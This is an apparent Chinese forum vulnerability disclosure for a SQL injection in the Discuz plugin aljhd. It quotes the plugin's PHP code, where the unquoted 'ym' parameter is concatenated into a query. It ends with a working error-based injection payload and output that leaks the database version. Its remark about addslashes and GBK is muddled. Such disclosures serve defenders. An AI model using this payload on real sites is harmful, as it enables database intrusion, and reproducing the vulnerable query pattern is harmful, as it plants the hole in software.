Discuz某插件sql注射漏洞

54pany

Author:Saline
Email:Nophacker@gmail.com
文件source/plugin/aljhd/aljhd.inc.php122行附近

[PHP] 纯文本查看 复制代码

}else{
    $ymlist=C::t('#aljhd#alj_hd')->fetch_all_by_ym();
    $typelist=C::t('#aljhd#alj_hd')->fetch_all_by_type();
     
    $currpage=$_GET['page']?$_GET['page']:1;
    $perpage=$config['page'];
    $num=C::t('#aljhd#alj_hd')->count_by_ym_type_status($_GET['ym'],$_GET['type'],$_GET['status']);
    $start=($currpage-1)*$perpage;
    $hdlist=C::t('#aljhd#alj_hd')->fetch_all_by_ym_type_status($_GET['ym'],$_GET['type'],$_GET['status'],$start,$perpage);
    $paging = helper_page :: multi($num, $perpage, $currpage, 'plugin.php?id=aljhd&ym='.$_GET['ym'].'&type='.$_GET['type'].'&status='.$_GET['status'], 0, 11, false, false);
     
    include template('aljhd:index');
}

然后其中的fetch_all_by_ym fetch_all_by_type fetch_all_by_ym_type_status count_by_ym_type_status几个函数在
文件source/plugin/aljhd/table/table_alj_hd.php中找到了

[PHP] 纯文本查看 复制代码

class table_alj_hd extends discuz_table
{
    public function __construct() {
 
        $this->_table = 'alj_hd';
        $this->_pk    = 'id';
 
        parent::__construct();
    }
    public function count_by_ym_type_status($ym,$type,$status){
        $where=' where 1';
        if($ym){
            $where.=' and ym='.addslashes($ym); //对$ym进行了addslashes转换
        }
        .......
        return DB::result_first('select count(*) from %t '.$where,array($this->_table));
    }
    public function fetch_all_by_ym_type_status($ym,$type,$status,$start,$perpage){
        $where=' where 1';
        if($ym){
            $where.=" and ym='".addslashes($ym)."'";//对$ym进行了addslashes转换
        }
         
        $where.=' order by endtime desc';
        if($perpage){
            $where.=" limit $start,$perpage";
        }
         //拼接出来的语句就是 select count(*) from alj_hd where 1 and  ym='.addslashes($ym) and type='.intval($type) and starttime<='.TIMESTAMP.' and endtime>='.TIMESTAMP;
        return DB::fetch_all('select * from %t '.$where,array($this->_table));
    }
    public function fetch_all_by_ym(){
        return DB::fetch_all('select ym,count(*) num from %t group by ym order by ym desc',array($this->_table));
    }
    public function fetch_all_by_type(){
        return DB::fetch_all('select type,count(*) num from %t group by type',array($this->_table));
    }
}

发现对其中的ym仅仅是做了addslashes处理，我们知道的addslashes编码仅仅是在gbk下才有作用，所有整个显得鸡肋

[PHP] 纯文本查看 复制代码

select count(*) from alj_hd where 1 and ym=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) and type=1
 
result:
 
(1062) Duplicate entry '5.5.29-log1' for key 'group_key'